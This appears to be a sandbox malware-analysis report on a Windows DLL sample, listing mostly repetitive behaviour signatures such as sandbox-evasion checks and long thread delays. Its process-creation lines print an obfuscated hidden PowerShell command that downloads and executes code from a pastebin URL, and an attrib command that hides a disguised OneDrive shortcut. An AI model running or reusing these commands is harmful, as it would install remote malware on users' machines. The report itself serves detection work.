Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7901Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1812Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7235
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2468
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7035
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2563
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6405
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3119
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 754Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5124Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4593Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 758
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 441
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6009
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3699
Source: C:\Windows\System32\loaddll64.exe TID: 2276Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2156Thread sleep count: 7901 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2156Thread sleep count: 1812 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5424Thread sleep time: -14757395258967632s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5308Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3940Thread sleep count: 7235 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1656Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6900Thread sleep count: 2468 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5388Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3472Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5864Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2672Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5696Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 340Thread sleep count: 754 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7104Thread sleep count: 161 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7000Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3580Thread sleep count: 5124 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4976Thread sleep time: -18446744073709540s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5564Thread sleep count: 4593 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6596Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2828Thread sleep count: 758 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4900Thread sleep count: 441 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1220Thread sleep count: 172 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2672Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5256Thread sleep count: 6009 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7172Thread sleep count: 36 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7172Thread sleep time: -33204139332677172s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5256Thread sleep count: 3699 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 00000008.00000002.3037122207.00000242CC5C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm
Source: powershell.exe, 0000000D.00000002.2517245546.00000278B44C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
Source: powershell.exe, 00000006.00000002.3066565736.00000276F9F09000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3038134380.000002271A470000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3196743622.00000223CF87E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DAEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HQsitBLlOv.dll",#1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
